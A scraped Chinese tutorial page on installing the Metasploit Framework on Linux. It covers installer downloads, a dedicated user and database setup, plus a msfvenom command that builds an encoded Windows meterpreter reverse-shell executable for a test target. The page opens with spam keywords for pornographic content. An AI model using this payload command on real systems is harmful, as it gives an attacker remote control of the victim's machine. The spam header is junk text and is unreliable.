好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > linux系統安裝msf的過程詳解

linux系統安裝msf的過程詳解

熱門標簽:重慶營銷外呼系統排名 網站上插入地圖標注內容 繽客網注冊時地圖標注出不來 地圖標注需要現場嗎 企業400電話辦理哪正規 400電話辦理哪家好廠商 鶴壁電銷外呼系統怎么安裝 工廠位置地圖標注 地圖標注企業名稱侵權案件

還是自己寫下安裝過程吧!

我的服務器系統是 Aliyun linux

1、下載安裝
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

可能報錯:Couldn't open file /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit

是因為安裝庫的問題!
解決方法:
yum install -y epel-release
然后再重復上面那條命令!

2、添加新用戶運行msf
adduser msf       #添加msf用戶
su msf                #切換到msf用戶
cd  /opt/metasploit-framework/bin   #切換到msf所在的目錄
./msfconsole
#以后啟動msfconsole,都切換到msf用戶下啟動,這樣會同步數據庫。
如果使用root用戶啟動的話,不會同步數據庫!
(啟動索引已經默認配好了!)
直接 msfconsole 就可以啟動了!

#相關命令
[msf@xxxx root]$ msf
msfbinscan msfconsole msfd   msfdb  
msfelfscan msfmachscan msfpescan msfrop  
msfrpc  msfrpcd  msfupdate msfvenom

#數據庫初始化
[msf@xxxx root]$ msfdb
Commands:
 init  initialize the component
 reinit delete and reinitialize the component
 delete delete and stop the component
 status check component status
 start start the component
 stop  stop the component
 restart restart the component
#測試:
e.g.我的虛擬主機是 Win2003(目標機)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp 
LHOST=msf_ip 
LPORT=4444 -e x86/shikata_ga_nai -f exe > test.exe

注:如果是彈性云服務器IP,LHOST 要設置為內網分配IP,不能設公網IP [被這個坑折騰好久!!!吐血!!!]

ps:linux系統下安裝msf框架

命令:

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run

等待運行結束即可。關鍵地方按回車和Y即可。

總結

到此這篇關于linux系統安裝msf的過程詳解的文章就介紹到這了,更多相關linux系統安裝msf內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

標簽:東莞 鹽城 96 棗莊 渭南 克拉瑪依 常州 日照

巨人網絡通訊聲明:本文標題《linux系統安裝msf的過程詳解》,本文關鍵詞  linux,系統,安裝,msf,的,過程,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《linux系統安裝msf的過程詳解》相關的同類信息!
  • 本頁收集關于linux系統安裝msf的過程詳解的相關信息資訊供網民參考!
  • 推薦文章